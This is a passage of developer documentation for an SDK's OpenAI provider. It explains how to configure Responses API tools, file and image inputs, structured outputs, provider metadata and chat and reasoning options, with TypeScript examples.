The textVerbosity parameter scales output length without changing the underlying prompt:

'low': Produces terse, minimal responses
'medium': Balanced detail (default)
'high': Verbose responses with comprehensive detail

Web Search Tool

The OpenAI responses API supports web search through the openai.tools.webSearch tool.

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search: openai.tools.webSearch({
      // optional configuration:
      externalWebAccess: true,
      searchContextSize: 'high',
      userLocation: {
        type: 'approximate',
        city: 'San Francisco',
        region: 'California',
      },
      filters: {
        allowedDomains: ['sfchronicle.com', 'sfgate.com'],
      },
    }),
  },
  // Force web search tool (optional):
  toolChoice: { type: 'tool', toolName: 'web_search' },
});

// URL sources directly from `results`
const sources = result.sources;

// Or access sources from tool results
for (const toolResult of result.toolResults) {
  if (toolResult.toolName === 'web_search') {
    console.log('Query:', toolResult.output.action.query);
    console.log('Sources:', toolResult.output.sources);
    // `sources` is an array of object: { type: 'url', url: string }
  }
}

The web search tool supports the following configuration options:

externalWebAccess boolean - Whether to use external web access for fetching live content. Defaults to true.
searchContextSize 'low' | 'medium' | 'high' - Controls the amount of context used for the search. Higher values provide more comprehensive results but may have higher latency and cost.
userLocation - Optional location information to provide geographically relevant results. Includes type (always 'approximate'), country, city, region, and timezone.
filters - Optional filter configuration to restrict search results.
- allowedDomains string[] - Array of allowed domains for the search. Subdomains of the provided domains are automatically included.

For detailed information on configuration options see the OpenAI Web Search Tool documentation.

File Search Tool

The OpenAI responses API supports file search through the openai.tools.fileSearch tool.

You can force the use of the file search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'file_search' }.

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'What does the document say about user authentication?',
  tools: {
    file_search: openai.tools.fileSearch({
      vectorStoreIds: ['vs_123'],
      // configuration below is optional:
      maxNumResults: 5,
      filters: {
        key: 'author',
        type: 'eq',
        value: 'Jane Smith',
      },
      ranking: {
        ranker: 'auto',
        scoreThreshold: 0.5,
      },
    }),
  },
  providerOptions: {
    openai: {
      // optional: include results
      include: ['file_search_call.results'],
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

The file search tool supports filtering with both comparison and compound filters:

Comparison filters - Filter by a single attribute:

eq - Equal to
ne - Not equal to
gt - Greater than
gte - Greater than or equal to
lt - Less than
lte - Less than or equal to
in - Value is in array
nin - Value is not in array

// Single comparison filter
filters: { key: 'year', type: 'gte', value: 2023 }

// Filter with array values
filters: { key: 'status', type: 'in', value: ['published', 'reviewed'] }

Compound filters - Combine multiple filters with and or or:

// Compound filter with AND
filters: {
  type: 'and',
  filters: [
    { key: 'author', type: 'eq', value: 'Jane Smith' },
    { key: 'year', type: 'gte', value: 2023 },
  ],
}

// Compound filter with OR
filters: {
  type: 'or',
  filters: [
    { key: 'department', type: 'eq', value: 'Engineering' },
    { key: 'department', type: 'eq', value: 'Research' },
  ],
}

Image Generation Tool

OpenAI's Responses API supports multi-modal image generation as a provider-defined tool. Availability is restricted to specific models (for example, gpt-5 variants).

You can use the image tool with either generateText or streamText:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt:
    'Generate an image of an echidna swimming across the Mozambique channel.',
  tools: {
    image_generation: openai.tools.imageGeneration({ outputFormat: 'webp' }),
  },
});

for (const toolResult of result.staticToolResults) {
  if (toolResult.toolName === 'image_generation') {
    const base64Image = toolResult.output.result;
  }
}

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai('gpt-5'),
  prompt:
    'Generate an image of an echidna swimming across the Mozambique channel.',
  tools: {
    image_generation: openai.tools.imageGeneration({
      outputFormat: 'webp',
      quality: 'low',
    }),
  },
});

for await (const part of result.fullStream) {
  if (part.type == 'tool-result' && !part.dynamic) {
    const base64Image = part.output.result;
  }
}

For complete details on model availability, image quality controls, supported sizes, and tool-specific parameters, refer to the OpenAI documentation:

Image generation overview and models: OpenAI Image Generation
Image generation tool parameters (background, size, quality, format, etc.): Image Generation Tool Options

Code Interpreter Tool

The OpenAI responses API supports the code interpreter tool through the openai.tools.codeInterpreter tool. This allows models to write and execute Python code.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'Write and run Python code to calculate the factorial of 10',
  tools: {
    code_interpreter: openai.tools.codeInterpreter({
      // optional configuration:
      container: {
        fileIds: ['file-123', 'file-456'], // optional file IDs to make available
      },
    }),
  },
});

The code interpreter tool can be configured with:

container: Either a container ID string or an object with fileIds to specify uploaded files that should be available to the code interpreter

MCP Tool

The OpenAI responses API supports connecting to Model Context Protocol (MCP) servers through the openai.tools.mcp tool. This allows models to call tools exposed by remote MCP servers or service connectors.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'Search the web for the latest news about AI developments',
  tools: {
    mcp: openai.tools.mcp({
      serverLabel: 'web-search',
      serverUrl: 'https://mcp.exa.ai/mcp',
      serverDescription: 'A web-search API for AI agents',
    }),
  },
});

The MCP tool can be configured with:

serverLabel string (required)

A label to identify the MCP server. This label is used in tool calls to distinguish between multiple MCP servers.
serverUrl string (required if connectorId is not provided)

The URL for the MCP server. Either serverUrl or connectorId must be provided.
connectorId string (required if serverUrl is not provided)

Identifier for a service connector. Either serverUrl or connectorId must be provided.
serverDescription string (optional)

Optional description of the MCP server that helps the model understand its purpose.
allowedTools string[] | object (optional)

Controls which tools from the MCP server are available. Can be:
- An array of tool names: ['tool1', 'tool2']
- An object with filters:
```
{
  readOnly: true, // Only allow read-only tools
  toolNames: ['tool1', 'tool2'] // Specific tool names
}
```
authorization string (optional)

OAuth access token for authenticating with the MCP server or connector.
headers Record<string, string> (optional)

Optional HTTP headers to include in requests to the MCP server.
requireApproval 'always' | 'never' | object (optional)

Controls which MCP tool calls require user approval before execution. Can be:
- 'always': All MCP tool calls require approval
- 'never': No MCP tool calls require approval (default)
- An object with filters:
```
{
  never: {
    toolNames: ['safe_tool', 'another_safe_tool']; // Skip approval for these tools
  }
}
```
When approval is required, the model will return a tool-approval-request content part that you can use to prompt the user for approval. See Human in the Loop for more details on implementing approval workflows.

Local Shell Tool

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-5-codex'),
  tools: {
    local_shell: openai.tools.localShell({
      execute: async ({ action }) => {
        // ... your implementation, e.g. sandbox access ...
        return { output: stdout };
      },
    }),
  },
  prompt: 'List the files in my home directory.',
  stopWhen: stepCountIs(2),
});

Shell Tool

The OpenAI Responses API supports the shell tool through the openai.tools.shell tool. The shell tool allows running bash commands and interacting with a command line. The model proposes shell commands; your integration executes them and returns the outputs.

The shell tool supports three environment modes that control where commands are executed:

Local Execution (default)

When no environment is specified (or type: 'local' is used), commands are executed locally via your execute callback:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5.2'),
  tools: {
    shell: openai.tools.shell({
      execute: async ({ action }) => {
        // ... your implementation, e.g. sandbox access ...
        return { output: results };
      },
    }),
  },
  prompt: 'List the files in the current directory and show disk usage.',
});

Hosted Container (auto)

Set environment.type to 'containerAuto' to run commands in an OpenAI-hosted container. No execute callback is needed — OpenAI handles execution server-side:

const result = await generateText({
  model: openai('gpt-5.2'),
  tools: {
    shell: openai.tools.shell({
      environment: {
        type: 'containerAuto',
        // optional configuration:
        memoryLimit: '4g',
        fileIds: ['file-abc123'],
        networkPolicy: {
          type: 'allowlist',
          allowedDomains: ['example.com'],
        },
      },
    }),
  },
  prompt: 'Install numpy and compute the eigenvalues of a 3x3 matrix.',
});

The containerAuto environment supports:

fileIds string[] - File IDs to make available in the container
memoryLimit '1g' | '4g' | '16g' | '64g' - Memory limit for the container
networkPolicy - Network access policy:
- { type: 'disabled' } — no network access
- { type: 'allowlist', allowedDomains: string[], domainSecrets?: Array<{ domain, name, value }> } — allow specific domains with optional secrets

Existing Container Reference

Set environment.type to 'containerReference' to use an existing container by ID:

const result = await generateText({
  model: openai('gpt-5.2'),
  tools: {
    shell: openai.tools.shell({
      environment: {
        type: 'containerReference',
        containerId: 'cntr_abc123',
      },
    }),
  },
  prompt: 'Check the status of running processes.',
});

Execute Callback

For local execution (default or type: 'local'), your execute function must return an output array with results for each command:

stdout string - Standard output from the command
stderr string - Standard error from the command
outcome - Either { type: 'timeout' } or { type: 'exit', exitCode: number }

Skills

Skills are versioned bundles of files with a SKILL.md manifest that extend the shell tool's capabilities. They can be attached to both containerAuto and local environments.

Container skills support two formats — by reference (for skills uploaded to OpenAI) or inline (as a base64-encoded zip):

const result = await generateText({
  model: openai('gpt-5.2'),
  tools: {
    shell: openai.tools.shell({
      environment: {
        type: 'containerAuto',
        skills: [
          // By reference:
          { type: 'skillReference', skillId: 'skill_abc123' },
          // Or inline:
          {
            type: 'inline',
            name: 'my-skill',
            description: 'What this skill does',
            source: {
              type: 'base64',
              mediaType: 'application/zip',
              data: readFileSync('./my-skill.zip').toString('base64'),
            },
          },
        ],
      },
    }),
  },
  prompt: 'Use the skill to solve this problem.',
});

Local skills point to a directory on disk containing a SKILL.md file:

const result = await generateText({
  model: openai('gpt-5.2'),
  tools: {
    shell: openai.tools.shell({
      execute: async ({ action }) => {
        // ... your local execution implementation ...
        return { output: results };
      },
      environment: {
        type: 'local',
        skills: [
          {
            name: 'my-skill',
            description: 'What this skill does',
            path: resolve('path/to/skill-directory'),
          },
        ],
      },
    }),
  },
  prompt: 'Use the skill to solve this problem.',
  stopWhen: stepCountIs(5),
});

For more details on creating skills, see the OpenAI Skills documentation.

Apply Patch Tool

The OpenAI Responses API supports the apply patch tool for GPT-5.1 models through the openai.tools.applyPatch tool. The apply patch tool lets the model create, update, and delete files in your codebase using structured diffs. Instead of just suggesting edits, the model emits patch operations that your application applies and reports back on, enabling iterative, multi-step code editing workflows.

import { openai } from '@ai-sdk/openai';
import { generateText, stepCountIs } from 'ai';

const result = await generateText({
  model: openai('gpt-5.1'),
  tools: {
    apply_patch: openai.tools.applyPatch({
      execute: async ({ callId, operation }) => {
        // ... your implementation for applying the diffs.
      },
    }),
  },
  prompt: 'Create a python file that calculates the factorial of a number',
  stopWhen: stepCountIs(5),
});

Your execute function must return:

status 'completed' | 'failed' - Whether the patch was applied successfully
output string (optional) - Human-readable log text (e.g., results or error messages)

Tool Search

Tool search allows the model to dynamically search for and load tools into context as needed, rather than loading all tool definitions up front. This can reduce token usage, cost, and latency when you have many tools. Mark the tools you want to make searchable with deferLoading: true in their providerOptions.

There are two execution modes:

Server-executed (hosted): OpenAI searches across the deferred tools declared in the request and returns the loaded subset in the same response. No extra round-trip is needed.
Client-executed: The model emits a tool_search_call, your application performs the lookup, and you return the matching tools via the execute callback.

Server-Executed (Hosted) Tool Search

Use hosted tool search when the candidate tools are already known at request time. Add openai.tools.toolSearch() with no arguments and mark your tools with deferLoading: true:

import { openai } from '@ai-sdk/openai';
import { generateText, tool, stepCountIs } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: openai.responses('gpt-5.4'),
  prompt: 'What is the weather in San Francisco?',
  stopWhen: stepCountIs(10),
  tools: {
    toolSearch: openai.tools.toolSearch(),

    get_weather: tool({
      description: 'Get the current weather at a specific location',
      inputSchema: z.object({
        location: z.string(),
        unit: z.enum(['celsius', 'fahrenheit']),
      }),
      execute: async ({ location, unit }) => ({
        location,
        temperature: unit === 'celsius' ? 18 : 64,
      }),
      providerOptions: {
        openai: { deferLoading: true },
      },
    }),

    search_files: tool({
      description: 'Search through files in the workspace',
      inputSchema: z.object({ query: z.string() }),
      execute: async ({ query }) => ({
        results: [`Found 3 files matching "${query}"`],
      }),
      providerOptions: {
        openai: { deferLoading: true },
      },
    }),
  },
});

In hosted mode, the model internally searches the deferred tools, loads the relevant ones, and proceeds to call them — all within a single response. The tool_search_call and tool_search_output items appear in the response with execution: 'server' and call_id: null.

Client-Executed Tool Search

Use client-executed tool search when tool discovery depends on runtime state — for example, tools that vary per tenant, project, or external system. Pass execution: 'client' along with a description, parameters schema, and an execute callback:

import { openai } from '@ai-sdk/openai';
import { generateText, tool, stepCountIs } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: openai.responses('gpt-5.4'),
  prompt: 'What is the weather in San Francisco?',
  stopWhen: stepCountIs(10),
  tools: {
    toolSearch: openai.tools.toolSearch({
      execution: 'client',
      description: 'Search for available tools based on what the user needs.',
      parameters: {
        type: 'object',
        properties: {
          goal: {
            type: 'string',
            description: 'What the user is trying to accomplish',
          },
        },
        required: ['goal'],
        additionalProperties: false,
      },
      execute: async ({ arguments: args }) => {
        // Your custom tool discovery logic here.
        // Return the tools that match the search goal.
        return {
          tools: [
            {
              type: 'function',
              name: 'get_weather',
              description: 'Get the current weather at a specific location',
              deferLoading: true,
              parameters: {
                type: 'object',
                properties: {
                  location: { type: 'string' },
                },
                required: ['location'],
                additionalProperties: false,
              },
            },
          ],
        };
      },
    }),

    get_weather: tool({
      description: 'Get the current weather at a specific location',
      inputSchema: z.object({ location: z.string() }),
      execute: async ({ location }) => ({
        location,
        temperature: 64,
        condition: 'Partly cloudy',
      }),
      providerOptions: {
        openai: { deferLoading: true },
      },
    }),
  },
});

In client mode, the flow spans two steps:

Step 1: The model emits a tool_search_call with execution: 'client' and a non-null call_id. The SDK calls your execute callback with the search arguments. Your callback returns the discovered tools.
Step 2: The SDK sends the tool_search_output (with the matching call_id) back to the model. The model can now call the loaded tools as normal function calls.

For more details, see the OpenAI Tool Search documentation.

Custom Tool

The OpenAI Responses API supports custom tools through the openai.tools.customTool tool. Custom tools return a raw string instead of JSON, optionally constrained to a grammar (regex or Lark syntax). This makes them useful for generating structured text like SQL queries, code snippets, or any output that must match a specific pattern.

import { openai } from '@ai-sdk/openai';
import { generateText, stepCountIs } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-5.2-codex'),
  tools: {
    write_sql: openai.tools.customTool({
      name: 'write_sql',
      description: 'Write a SQL SELECT query to answer the user question.',
      format: {
        type: 'grammar',
        syntax: 'regex',
        definition: 'SELECT .+',
      },
      execute: async input => {
        // input is a raw string matching the grammar, e.g. "SELECT * FROM users WHERE age > 25"
        const rows = await db.query(input);
        return JSON.stringify(rows);
      },
    }),
  },
  toolChoice: 'required',
  prompt: 'Write a SQL query to get all users older than 25.',
  stopWhen: stepCountIs(3),
});

Custom tools also work with streamText:

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai.responses('gpt-5.2-codex'),
  tools: {
    write_sql: openai.tools.customTool({
      name: 'write_sql',
      description: 'Write a SQL SELECT query to answer the user question.',
      format: {
        type: 'grammar',
        syntax: 'regex',
        definition: 'SELECT .+',
      },
    }),
  },
  toolChoice: 'required',
  prompt: 'Write a SQL query to get all users older than 25.',
});

for await (const chunk of result.fullStream) {
  if (chunk.type === 'tool-call') {
    console.log(`Tool: ${chunk.toolName}`);
    console.log(`Input: ${chunk.input}`);
  }
}

The custom tool can be configured with:

name string (required) - The name of the custom tool. Used to identify the tool in tool calls.
description string (optional) - A description of what the tool does, to help the model understand when to use it.
format object (optional) - The output format constraint. Omit for unconstrained text output.
- type 'grammar' | 'text' - The format type. Use 'grammar' for constrained output or 'text' for explicit unconstrained text.
- syntax 'regex' | 'lark' - (grammar only) The grammar syntax. Use 'regex' for regular expression patterns or 'lark' for Lark parser grammar.
- definition string - (grammar only) The grammar definition string (a regex pattern or Lark grammar).
execute function (optional) - An async function that receives the raw string input and returns a string result. Enables multi-turn tool calling.

Image Inputs

The OpenAI Responses API supports Image inputs for appropriate models. You can pass Image files as part of the message content using the 'image' type:

const result = await generateText({
  model: openai('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Please describe the image.',
        },
        {
          type: 'image',
          image: readFileSync('./data/image.png'),
        },
      ],
    },
  ],
});

The model will have access to the image and will respond to questions about it. The image should be passed using the image field.

You can also pass a file-id from the OpenAI Files API.

{
  type: 'image',
  image: 'file-8EFBcWHsQxZV7YGezBC1fq'
}

You can also pass the URL of an image.

{
  type: 'image',
  image: 'https://sample.edu/image.png',
}

PDF Inputs

The OpenAI Responses API supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: openai('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model?',
        },
        {
          type: 'file',
          data: readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

You can also pass a file-id from the OpenAI Files API.

{
  type: 'file',
  data: 'file-8EFBcWHsQxZV7YGezBC1fq',
  mediaType: 'application/pdf',
}

You can also pass the URL of a pdf.

{
  type: 'file',
  data: 'https://sample.edu/example.pdf',
  mediaType: 'application/pdf',
  filename: 'ai.pdf', // optional
}

Structured Outputs

The OpenAI Responses API supports structured outputs. You can use generateText or streamText with Output to enforce structured outputs.

const result = await generateText({
  model: openai('gpt-4.1'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({
            name: z.string(),
            amount: z.string(),
          }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

Typed providerMetadata in Text Parts

When using the OpenAI Responses API, the SDK attaches OpenAI-specific metadata to output parts via providerMetadata.

This metadata can be used on the client side for tasks such as rendering citations or downloading files generated by the Code Interpreter. To enable type-safe handling of this metadata, the AI SDK exports dedicated TypeScript types.

For text parts, when part.type === 'text', the providerMetadata is provided in the form of OpenaiResponsesTextProviderMetadata.

This metadata includes the following fields:

itemId The ID of the output item in the Responses API.
annotations (optional) An array of annotation objects generated by the model. If no annotations are present, this property itself may be omitted (undefined).

Each element in annotations is a discriminated union with a required type field. Supported types include, for example:
- url_citation
- file_citation
- container_file_citation
- file_path
These annotations directly correspond to the annotation objects defined by the Responses API and can be used for inline reference rendering or output analysis. For details, see the official OpenAI documentation: Responses API – output text annotations.

import {
  openai,
  type OpenaiResponsesTextProviderMetadata,
} from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-4.1-mini'),
  prompt:
    'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
  tools: {
    code_interpreter: openai.tools.codeInterpreter(),
    web_search: openai.tools.webSearch(),
    file_search: openai.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
  },
});

for (const part of result.content) {
  if (part.type === 'text') {
    const providerMetadata = part.providerMetadata as
      | OpenaiResponsesTextProviderMetadata
      | undefined;
    if (!providerMetadata) continue;
    const { itemId: _itemId, annotations } = providerMetadata.openai;

    if (!annotations) continue;
    for (const annotation of annotations) {
      switch (annotation.type) {
        case 'url_citation':
          // url_citation is returned from web_search and provides:
          // properties: type, url, title, start_index and end_index
          break;
        case 'file_citation':
          // file_citation is returned from file_search and provides:
          // properties: type, file_id, filename and index
          break;
        case 'container_file_citation':
          // container_file_citation is returned from code_interpreter and provides:
          // properties: type, container_id, file_id, filename, start_index and end_index
          break;
        case 'file_path':
          // file_path provides:
          // properties: type, file_id and index
          break;
        default: {
          const _exhaustiveCheck: never = annotation;
          throw new Error(
            `Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
          );
        }
      }
    }
  }
}

Typed providerMetadata in Reasoning Parts

When using the OpenAI Responses API, reasoning output parts can include provider metadata. To handle this metadata in a type-safe way, use OpenaiResponsesReasoningProviderMetadata.

For reasoning parts, when part.type === 'reasoning', the providerMetadata is provided in the form of OpenaiResponsesReasoningProviderMetadata.

This metadata includes the following fields:

itemId
The ID of the reasoning item in the Responses API.
reasoningEncryptedContent (optional)
Encrypted reasoning content (only returned when requested via include: ['reasoning.encrypted_content']).

import {
  openai,
  type OpenaiResponsesReasoningProviderMetadata,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'How many "r"s are in the word "strawberry"?',
  providerOptions: {
    openai: {
      store: false,
      include: ['reasoning.encrypted_content'],
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

for (const part of result.content) {
  if (part.type === 'reasoning') {
    const providerMetadata = part.providerMetadata as
      | OpenaiResponsesReasoningProviderMetadata
      | undefined;

    const { itemId, reasoningEncryptedContent } =
      providerMetadata?.openai ?? {};
    console.log(itemId, reasoningEncryptedContent);
  }
}

Typed providerMetadata in Source Document Parts

For source document parts, when part.type === 'source' and sourceType === 'document', the providerMetadata is provided as OpenaiResponsesSourceDocumentProviderMetadata.

This metadata is also a discriminated union with a required type field. Supported types include:

file_citation
container_file_citation
file_path

Each type includes the identifiers required to work with the referenced resource, such as fileId and containerId.

import {
  openai,
  type OpenaiResponsesSourceDocumentProviderMetadata,
} from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-4.1-mini'),
  prompt:
    'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
  tools: {
    code_interpreter: openai.tools.codeInterpreter(),
    web_search: openai.tools.webSearch(),
    file_search: openai.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
  },
});

for (const part of result.content) {
  if (part.type === 'source') {
    if (part.sourceType === 'document') {
      const providerMetadata = part.providerMetadata as
        | OpenaiResponsesSourceDocumentProviderMetadata
        | undefined;
      if (!providerMetadata) continue;
      const annotation = providerMetadata.openai;
      switch (annotation.type) {
        case 'file_citation':
          // file_citation is returned from file_search and provides:
          // properties: type, fileId and index
          // The filename can be accessed via part.filename.
          break;
        case 'container_file_citation':
          // container_file_citation is returned from code_interpreter and provides:
          // properties: type, containerId and fileId
          // The filename can be accessed via part.filename.
          break;
        case 'file_path':
          // file_path provides:
          // properties: type, fileId and index
          break;
        default: {
          const _exhaustiveCheck: never = annotation;
          throw new Error(
            `Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
          );
        }
      }
    }
  }
}

Chat Models

const model = openai.chat('gpt-5');

OpenAI chat models support also some model specific provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';

const model = openai.chat('gpt-5');

await generateText({
  model,
  providerOptions: {
    openai: {
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAILanguageModelChatOptions,
  },
});

The following optional provider options are available for OpenAI chat models:

logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Defaults to true.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
reasoningEffort 'minimal' | 'low' | 'medium' | 'high' | 'xhigh'

Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
maxCompletionTokens number

Maximum number of completion tokens to generate. Useful for reasoning models.
store boolean

Whether to enable persistence in Responses API.
metadata Record<string, string>

Metadata to associate with the request.
prediction Record<string, any>

Parameters for prediction mode.
serviceTier 'auto' | 'flex' | 'priority' | 'default'

Service tier for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency (available for o3, o4-mini, and gpt-5 models). Set to 'priority' for faster processing with Enterprise access (available for gpt-4, gpt-5, gpt-5-mini, o3, o4-mini; gpt-5-nano is not supported).

Defaults to 'auto'.
strictJsonSchema boolean

Whether to use strict JSON schema validation. Defaults to true.
textVerbosity 'low' | 'medium' | 'high'

Controls the verbosity of the model's responses. Lower values will result in more concise responses, while higher values will result in more verbose responses.
promptCacheKey string

A cache key for manual prompt caching control. Used by OpenAI to cache responses for similar requests to optimize your cache hit rates.
promptCacheRetention 'in_memory' | '24h'

The retention policy for the prompt cache. Set to '24h' to enable extended prompt caching, which keeps cached prefixes active for up to 24 hours. Defaults to 'in_memory' for standard prompt caching. Note: '24h' is currently only available for the 5.1 series of models.
safetyIdentifier string

A stable identifier used to help detect users of your application that may be violating OpenAI's usage policies. The IDs should be a string that uniquely identifies each user.
systemMessageMode 'system' | 'developer' | 'remove'

Override the system message mode for this model. If not specified, the mode is automatically determined based on the model. system uses the 'system' role for system messages (default for most models); developer uses the 'developer' role (used by reasoning models); remove removes system messages entirely.
forceReasoning boolean

Force treating this model as a reasoning model. This is useful for "stealth" reasoning models (e.g. via a custom baseURL) where the model ID is not recognized by the SDK's allowlist. When enabled, the SDK applies reasoning-model parameter compatibility rules and defaults systemMessageMode to developer unless overridden.

Reasoning

OpenAI has introduced the o1,o3, and o4 series of reasoning models. Currently, o4-mini, o3, o3-mini, and o1 are available via both the chat and responses APIs. The model gpt-5.1-codex-mini is available only via the responses API.

Reasoning models currently only generate text, have several limitations, and are only supported using generateText and streamText.

They support additional settings and response metadata:

You can use providerOptions to set
- the reasoningEffort option (or alternatively the reasoningEffort model setting), which determines the amount of reasoning the model performs.
You can use response providerMetadata to access the number of reasoning tokens that the model generated.

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai.chat('gpt-5'),
  prompt: 'Invent a new holiday and describe its traditions.',
  providerOptions: {
    openai: {
      reasoningEffort: 'low',
    } satisfies OpenAILanguageModelChatOptions,
  },
});

console.log(text);
console.log('Usage:', {
  ...usage,
  reasoningTokens: providerMetadata?.openai?.reasoningTokens,
});

You can control how system messages are handled by providerOptions systemMessageMode:
- developer: treat the prompt as a developer message (default for reasoning models).
- system: keep the system message as a system-level instruction.
- remove: remove the system message from the messages.

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.chat('gpt-5'),
  messages: [
    { role: 'system', content: 'You are a helpful assistant.' },
    { role: 'user', content: 'Tell me a joke.' },
  ],
  providerOptions: {
    openai: {
      systemMessageMode: 'system',
    } satisfies OpenAILanguageModelChatOptions,
  },
});

Strict Structured Outputs

Strict structured outputs are enabled by default. You can disable them by setting the strictJsonSchema option to false.

import { openai, OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: openai.chat('gpt-4o-2024-08-06'),
  providerOptions: {
    openai: {
      strictJsonSchema: false,
    } satisfies OpenAILanguageModelChatOptions,
  },
  output: Output.object({
    schema: z.object({
      name: z.string(),
      ingredients: z.array(
        z.object({
          name: z.string(),
          amount: z.string(),
        }),
      ),
      steps: z.array(z.string()),
    }),
    schemaName: 'recipe',
    schemaDescription: 'A recipe for lasagna.',
  }),
  prompt: 'Generate a lasagna recipe.',
});

console.log(JSON.stringify(result.output, null, 2));

For example, optional schema properties are not supported. You need to change Zod .nullish() and .optional() to .nullable().

Logprobs

OpenAI provides logprobs information for completion/chat models. You can access it in the providerMetadata object.

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.chat('gpt-5'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  providerOptions: {
    openai: {
      // this can also be a number,
      // refer to logprobs provider options section for more
      logprobs: true,
    } satisfies OpenAILanguageModelChatOptions,
  },
});

const openaiMetadata = (await result.providerMetadata)?.openai;

const logprobs = openaiMetadata?.logprobs;

Image Support

The OpenAI Chat API supports Image inputs for appropriate models. You can pass Image files as part of the message content using the 'image' type:

const result = await generateText({
  model: openai.chat('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Please describe the image.',
        },
        {
          type: 'image',
          image: readFileSync('./data/image.png'),
        },
      ],
    },
  ],
});

The model will have access to the image and will respond to questions about it. The image should be passed using the image field.

You can also pass the URL of an image.

{
  type: 'image',
  image: 'https://sample.edu/image.png',
}

PDF support

The OpenAI Chat API supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: openai.chat('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model?',
        },
        {
          type: 'file',
          data: readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

You can also pass a file-id from the OpenAI Files API.

{
  type: 'file',
  data: 'file-8EFBcWHsQxZV7YGezBC1fq',
  mediaType: 'application/pdf',
}

You can also pass the URL of a PDF.

{
  type: 'file',
  data: 'https://sample.edu/example.pdf',
  mediaType: 'application/pdf',
  filename: 'ai.pdf', // optional
}

Predicted Outputs

const result = streamText({
  model: openai.chat('gpt-5'),
  messages: [
    {
      role: 'user',
      content: 'Replace the Username property with an Email property.',
    },
    {
      role: 'user',
      content: existingCode,
    },
  ],
  providerOptions: {
    openai: {
      prediction: {
        type: 'content',
        content: existingCode,
      },
    } satisfies OpenAILanguageModelChatOptions,
  },
});

OpenAI provides usage information for predicted outputs (acceptedPredictionTokens and rejectedPredictionTokens). You can access it in the providerMetadata object.

const openaiMetadata = (await result.providerMetadata)?.openai;

